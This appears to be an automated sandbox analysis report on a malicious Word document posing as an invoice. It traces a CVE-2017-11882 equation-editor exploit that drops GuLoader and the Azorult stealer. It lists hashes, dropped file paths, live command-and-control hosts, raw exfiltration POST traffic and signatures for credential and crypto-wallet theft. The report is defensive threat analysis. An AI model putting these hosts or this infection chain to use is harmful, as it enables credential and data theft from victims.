Analysis Report Invoice and documents.doc

Overview

General Information

Sample Name:Invoice and documents.doc
Analysis ID:287949
MD5:007853972dfeabc5d367f853fa62a59a
SHA1:303fb9261c4279cff64f973081d1b339c2fde73e
SHA256:d3b837c6df7e17d6f6ff9c20066fa5b0064408935d62bacdd4c9b5791002b941
Tags:doc

Detection

Azorult GuLoader
Score:100
Range:0 - 100
Whitelisted:false
Confidence:100%

Signatures

Multi AV Scanner detection for dropped file
Multi AV Scanner detection for submitted file
Sigma detected: Droppers Exploiting CVE-2017-11882
Sigma detected: File Dropped By EQNEDT32EXE
Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Yara detected Azorult
Yara detected GuLoader
Binary contains a suspicious time stamp
Contains functionality to hide a thread from the debugger
Found many strings related to Crypto-Wallets (likely being stolen)
Hides threads from debuggers
Office equation editor drops PE file
Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Tries to detect Any.run
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Tries to harvest and steal Putty / WinSCP information (sessions, passwords, etc)
Tries to harvest and steal browser information (history, passwords, etc)
Tries to harvest and steal ftp login credentials
Tries to steal Instant Messenger accounts or passwords
Tries to steal Mail credentials (via file access)
Yara detected VB6 Downloader Generic
Allocates memory within range which is reserved for system DLLs (kernel32.dll, advapi32.dll, etc)
Checks if the current process is being debugged
Contains capabilities to detect virtual machines
Contains functionality for execution timing, often used to detect debuggers
Contains functionality to access loader functionality (e.g. LdrGetProcedureAddress)
Contains functionality to call native functions
Contains functionality to read the PEB
Creates a process in suspended mode (likely to inject code)
Detected potential crypto function
Drops PE files
Found dropped PE file which has not been started or loaded
Internet Provider seen in connection with other malware
JA3 SSL client fingerprint seen in connection with other malware
May sleep (evasive loops) to hinder dynamic analysis
Monitors certain registry keys / values for changes (often done to protect autostart functionality)
Office Equation Editor has been started
PE file contains strange resources
PE file does not import any functions
Potential document exploit detected (performs DNS queries)
Potential document exploit detected (performs HTTP gets)
Potential document exploit detected (unknown TCP traffic)
Queries information about the installed CPU (vendor, model number etc)
Searches for user specific document files
Uses a known web browser user agent for HTTP communication
Uses code obfuscation techniques (call, push, ret)

Classification

Startup

  • System is w7x64
  • WINWORD.EXE (PID: 2052 cmdline: 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding MD5: 95C38D04597050285A18F66039EDB456)
  • EQNEDT32.EXE (PID: 532 cmdline: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding MD5: A87236E214F6D42A65F5DEDAC816AEC8)
    • hfoewnmm.exe (PID: 2528 cmdline: C:\Users\user\AppData\Roaming\hfoewnmm.exe MD5: 1A6B1BD215DA5B28AF2E26EB47CBD3CD)
      • hfoewnmm.exe (PID: 2628 cmdline: C:\Users\user\AppData\Roaming\hfoewnmm.exe MD5: 1A6B1BD215DA5B28AF2E26EB47CBD3CD)
  • cleanup

Malware Configuration

No configs have been found

Yara Overview

Memory Dumps

Source | Rule | Description | Author | Strings
00000005.00000003.2136713205.000000001FC44000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
00000005.00000003.2136725085.000000001EB50000.00000004.00000001.sdmp | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
Process Memory Space: hfoewnmm.exe PID: 2628 | JoeSecurity_Azorult_1 | Yara detected Azorult | Joe Security |
Process Memory Space: hfoewnmm.exe PID: 2528 | JoeSecurity_VB6DownloaderGeneric | Yara detected VB6 Downloader Generic | Joe Security |
Process Memory Space: hfoewnmm.exe PID: 2528 | JoeSecurity_GuLoader | Yara detected GuLoader | Joe Security |

Sigma Overview

System Summary:

Sigma detected: Droppers Exploiting CVE-2017-11882
Source: Process started | Author: Florian Roth: Data: Command: C:\Users\user\AppData\Roaming\hfoewnmm.exe, CommandLine: C:\Users\user\AppData\Roaming\hfoewnmm.exe, CommandLine|base64offset|contains: , Image: C:\Users\user\AppData\Roaming\hfoewnmm.exe, NewProcessName: C:\Users\user\AppData\Roaming\hfoewnmm.exe, OriginalFileName: C:\Users\user\AppData\Roaming\hfoewnmm.exe, ParentCommandLine: 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding, ParentImage: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ParentProcessId: 532, ProcessCommandLine: C:\Users\user\AppData\Roaming\hfoewnmm.exe, ProcessId: 2528
Sigma detected: File Dropped By EQNEDT32EXE
Source: File created | Author: Joe Security: Data: EventID: 11, Image: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE, ProcessId: 532, TargetFilename: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe

Signature Overview

AV Detection:

Multi AV Scanner detection for dropped file
Source: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe | Virustotal: Detection: 19%
Multi AV Scanner detection for submitted file
Source: Invoice and documents.doc | Virustotal: Detection: 37%
Source: Invoice and documents.doc | ReversingLabs: Detection: 48%

Exploits:

Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: global traffic | DNS query: name: www.uttaranchaltoday.com
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443
Source: global traffic | TCP traffic: 192.168.2.22:49167 -> 172.67.176.142:443

Networking:

Snort IDS alert for network traffic (e.g. based on Emerging Threat rules)
Source: Traffic | Snort IDS: 2029405 ET TROJAN Win32/AZORult V3.3 Client Checkin M2 192.168.2.22:49170 -> 103.247.10.55:80
Source: Traffic | Snort IDS: 2029136 ET TROJAN AZORult v3.3 Server Response M1 103.247.10.55:80 -> 192.168.2.22:49170
Source: Joe Sandbox View | ASN Name: RUMAHWEB-AS-IDRumahwebIndonesiaCVID RUMAHWEB-AS-IDRumahwebIndonesiaCVID
Source: Joe Sandbox View | JA3 fingerprint: 7dcce5b76c8b17472d024758970a406b
Source: global traffic | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 103 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: global traffic | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 23025 | Cache-Control: no-cache
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.Word\~WRS{BD6A1C03-4E04-4856-9DA8-291722E1F767}.tmp
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | String found in binary or memory: Please visit http://www.hotmail.com/oe to learn more. equals www.hotmail.com (Hotmail)
Source: unknown | DNS traffic detected: queries for: www.uttaranchaltoday.com
Source: unknown | HTTP traffic detected: POST /linkzer/PL341/index.php HTTP/1.1 | User-Agent: Mozilla/4.0 (compatible; MSIE 6.0b; Windows NT 5.1) | Host: officestore.co.id | Content-Length: 103 | Cache-Control: no-cache | Data Raw: 00 00 00 26 66 96 42 11 8b 30 64 8b 30 62 ec 26 66 99 40 70 9c 47 70 9d 30 70 9d 37 70 9d 30 14 8b 30 67 eb 40 70 9d 35 70 9c 47 16 8b 30 65 8b 30 63 8b 30 65 8b 30 67 ed 41 70 9d 36 70 9c 47 70 9d 30 70 9d 3a 10 ef 26 66 9b 26 66 9f 26 66 9d 26 66 9d 26 67 ea 26 66 9c 47 13 8b 30 61 ec 45 70 9d 33 70 9d 35 | Data Ascii: &fB0d0b&f@pGp0p7p00g@p5pG0e0c0e0gAp6pGp0p:&f&f&f&f&g&fG0aEp3p5
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertAssuredIDRootCA.crt0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://cacerts.digicert.com/DigiCertSHA2AssuredIDCodeSigningCA.crt0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl.thawte.com/ThawteTimestampingCA.crl0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/DigiCertAssuredIDRootCA.crl0O
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl3.digicert.com/sha2-assured-cs-g1.crl05
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/DigiCertAssuredIDRootCA.crl0:
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://crl4.digicert.com/sha2-assured-cs-g1.crl0L
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | String found in binary or memory: http://investor.msn.com/
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XML.asp
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp | String found in binary or memory: http://localizability/practices/XMLConfiguration.asp
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0C
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.digicert.com0N
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ocsp.thawte.com0
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp | String found in binary or memory: http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-aia.ws.symantec.com/tss-ca-g2.cer0
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-crl.ws.symantec.com/tss-ca-g2.crl0(
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://ts-ocsp.ws.symantec.com07
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp | String found in binary or memory: http://windowsmedia.com/redir/services.asp?WMPFriendly=true
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | String found in binary or memory: http://www.hotmail.com/oe
Source: hfoewnmm.exe, 00000004.00000002.2097227262.00000000033C7000.00000002.00000001.sdmp | String found in binary or memory: http://www.icra.org/vocabulary/.
Source: mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com/en-US/blocklist/
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: http://www.mozilla.com0
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | String found in binary or memory: http://www.msnbc.com/news/ticker.txt
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | String found in binary or memory: http://www.windows.com/pctv.
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, mozglue.dll.5.dr | String found in binary or memory: https://www.digicert.com/CPS0
Source: 6335590522394284581959.tmp.5.dr | String found in binary or memory: https://www.google.com/search?q=test&oq=test&aqs=chrome..69i57j0j46j0l2j46j0j5.485j0j8&sourceid=chro
Source: unknown | Network traffic detected: HTTP traffic on port 443 -> 49167
Source: unknown | Network traffic detected: HTTP traffic on port 49167 -> 443

System Summary:

Office equation editor drops PE file
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\linkscry[1].exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File created: C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Memory allocated: 76E20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Memory allocated: 76D20000 page execute and read and write
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_003214B7 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0032021B EnumWindows,NtSetInformationThread,CloseServiceHandle,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00323AF0 NtResumeThread,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0032374C NtProtectVirtualMemory,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_003213B7 NtSetInformationThread,CloseServiceHandle,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00323C1D NtResumeThread,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0032151A NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_003235A6 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_003231AA NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00321994 NtSetInformationThread,CloseServiceHandle,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_0032027D NtSetInformationThread,CloseServiceHandle,TerminateProcess,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00321685 NtWriteVirtualMemory,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00323B0C NtResumeThread,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00323B5D NtResumeThread,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00323BB4 NtResumeThread,
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_004013E4
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 4_2_00401401
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Code function: 5_3_1F2D85DF
Source: linkscry[1].exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: hfoewnmm.exe.2.dr | Static PE information: Resource name: RT_ICON type: GLS_BINARY_LSB_FIRST
Source: api-ms-win-core-errorhandling-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-debug-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-datetime-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: api-ms-win-core-console-l1-1-0.dll.5.dr | Static PE information: No import functions for PE file found
Source: hfoewnmm.exe, 00000004.00000002.2096174059.00000000031E0000.00000002.00000001.sdmp | Binary or memory string: .VBPud<_
Source: classification engine | Classification label: mal100.phis.troj.spyw.expl.evad.winDOC@6/61@4/2
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\Desktop\~$voice and documents.doc
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Mutant created: \Sessions\1\BaseNamedObjects\A8AD17B7C-343A2EC6-C0602CB5-39EA5133-2DF4BF06
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File created: C:\Users\user\AppData\Local\Temp\CVRCE94.tmp
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Section loaded: C:\Windows\SysWOW64\msvbvm60.dll
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File read: C:\Users\desktop.ini
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Key opened: HKEY_CURRENT_USER\Software\Policies\Microsoft\SystemCertificates\CA
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | File read: C:\Windows\System32\drivers\etc\hosts
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: CREATE TABLE metaData (id PRIMARY KEY UNIQUE ON CONFLICT REPLACE, item1, item2);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL %s FROM %s WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: INSERT INTO %Q.%s VALUES('index',%Q,%Q,#%d,%Q);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL * FROM %s LIMIT 0;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_docsize'(docid INTEGER PRIMARY KEY, size BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE IF NOT EXISTS %Q.'%q_stat'(id INTEGER PRIMARY KEY, value BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: UPDATE %s SET %s WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segdir'(level INTEGER,idx INTEGER,start_block INTEGER,leaves_end_block INTEGER,end_block INTEGER,root BLOB,PRIMARY KEY(level, idx));
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL * FROM metaData WHERE id=$ID;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL id FROM %s WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: SELECT ALL id FROM %s;
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: INSERT INTO metaData (id,item1) VALUES($ID,$ITEM1);
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: INSERT INTO %s (id%s) VALUES($ID%s);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: UPDATE "%w".%s SET sql = sqlite_rename_parent(sql, %Q, %Q) WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: UPDATE sqlite_temp_master SET sql = sqlite_rename_trigger(sql, %Q), tbl_name = %Q WHERE %s;
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE %Q.'%q_segments'(blockid INTEGER PRIMARY KEY, block BLOB);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: CREATE TABLE xx( name TEXT, /* Name of table or index */ path TEXT, /* Path to page from root */ pageno INTEGER, /* Page number */ pagetype TEXT, /* 'internal', 'leaf' or 'overflow' */ ncell INTEGER, /* Cells on page (0 for overflow) */ payload INTEGER, /* Bytes of payload on this page */ unused INTEGER, /* Bytes of unused space on this page */ mx_payload INTEGER, /* Largest payload size of all cells */ pgoffset INTEGER, /* Offset of page in file */ pgsize INTEGER, /* Size of the page */ schema TEXT HIDDEN /* Database schema being analyzed */);
Source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr | Binary or memory string: UPDATE %Q.%s SET sql = CASE WHEN type = 'trigger' THEN sqlite_rename_trigger(sql, %Q)ELSE sqlite_rename_table(sql, %Q) END, tbl_name = %Q, name = CASE WHEN type='table' THEN %Q WHEN name LIKE 'sqlite_autoindex%%' AND type='index' THEN 'sqlite_autoindex_' || %Q || substr(name,%d+18) ELSE name END WHERE tbl_name=%Q COLLATE nocase AND (type='table' OR type='index' OR type='trigger');
Source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, softokn3.dll.5.dr | Binary or memory string: INSERT INTO metaData (id,item1,item2) VALUES($ID,$ITEM1,$ITEM2);
Source: Invoice and documents.doc | Virustotal: Detection: 37%
Source: Invoice and documents.doc | ReversingLabs: Detection: 48%
Source: unknown | Process created: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE 'C:\Program Files\Microsoft Office\Office14\WINWORD.EXE' /Automation -Embedding
Source: unknown | Process created: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE 'C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE' -Embedding
Source: unknown | Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: unknown | Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Process created: C:\Users\user\AppData\Roaming\hfoewnmm.exe C:\Users\user\AppData\Roaming\hfoewnmm.exe
Source: C:\Users\user\AppData\Roaming\hfoewnmm.exe | Key value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\Wow6432Node\CLSID\{DCB00C01-570F-4A9B-8D69-199FDBA5723B}\InProcServer32
Source: Window Recorder | Window detected: More than 3 window changes detected
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | Key opened: HKEY_CURRENT_USER\Software\Microsoft\Office\14.0\Word\Resiliency\StartupItems
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXE | File opened: C:\Windows\WinSxS\amd64_microsoft.vc90.crt_1fc8b3b9a1e18e3b_9.0.30729.4940_none_08e4299fa83d7e3c\MSVCR90.dll
Source: Binary string: api-ms-win-crt-locale-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130947235.000000001FCE0000.00000004.00000001.sdmp, api-ms-win-crt-locale-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-runtime-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127983806.000000001F2E0000.00000004.00000001.sdmp, api-ms-win-crt-runtime-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss3.pdb source: hfoewnmm.exe, 00000005.00000003.2131647036.000000001F150000.00000004.00000001.sdmp, nss3.dll.5.dr
Source: Binary string: api-ms-win-core-file-l1-2-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130295141.000000001FC54000.00000004.00000001.sdmp, api-ms-win-core-file-l1-2-0.dll.5.dr
Source: Binary string: ucrtbase.pdb source: hfoewnmm.exe, 00000005.00000003.2131995490.000000001FD20000.00000004.00000001.sdmp, ucrtbase.dll.5.dr
Source: Binary string: api-ms-win-core-memory-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130445299.000000001FC84000.00000004.00000001.sdmp, api-ms-win-core-memory-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdb source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
Source: Binary string: api-ms-win-core-debug-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130225554.000000001FC48000.00000004.00000001.sdmp, api-ms-win-core-debug-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-sysinfo-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-sysinfo-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-filesystem-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-filesystem-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-stdio-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2128043527.000000001F2D8000.00000004.00000001.sdmp, api-ms-win-crt-stdio-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-heap-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130372042.000000001FC6C000.00000004.00000001.sdmp, api-ms-win-core-heap-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-util-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127631724.000000001FE34000.00000004.00000001.sdmp, api-ms-win-core-util-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-synch-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130708589.000000001FCA0000.00000004.00000001.sdmp, api-ms-win-core-synch-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-crt-environment-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130881671.000000001FCC8000.00000004.00000001.sdmp, api-ms-win-crt-environment-l1-1-0.dll.5.dr
Source: Binary string: vcruntime140.i386.pdbGCTL source: hfoewnmm.exe, 00000005.00000003.2131954807.000000001F298000.00000004.00000001.sdmp, vcruntime140.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\mozglue\build\mozglue.pdb11 source: hfoewnmm.exe, 00000005.00000003.2131093631.000000001F060000.00000004.00000001.sdmp, mozglue.dll.5.dr
Source: Binary string: api-ms-win-core-errorhandling-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2130267131.000000001FC50000.00000004.00000001.sdmp, api-ms-win-core-errorhandling-l1-1-0.dll.5.dr
Source: Binary string: api-ms-win-core-processthreads-l1-1-0.pdb source: hfoewnmm.exe, 00000005.00000003.2127208242.000000001F2D4000.00000004.00000001.sdmp, api-ms-win-core-processthreads-l1-1-0.dll.5.dr
Source: Binary string: z:\build\build\src\obj-firefox\security\nss\lib\freebl\freebl_freebl3\freebl3.pdbZZ source: hfoewnmm.exe, 00000005.00000003.2128331675.000000001F330000.00000004.00000001.sdmp, freebl3.dll.5.dr
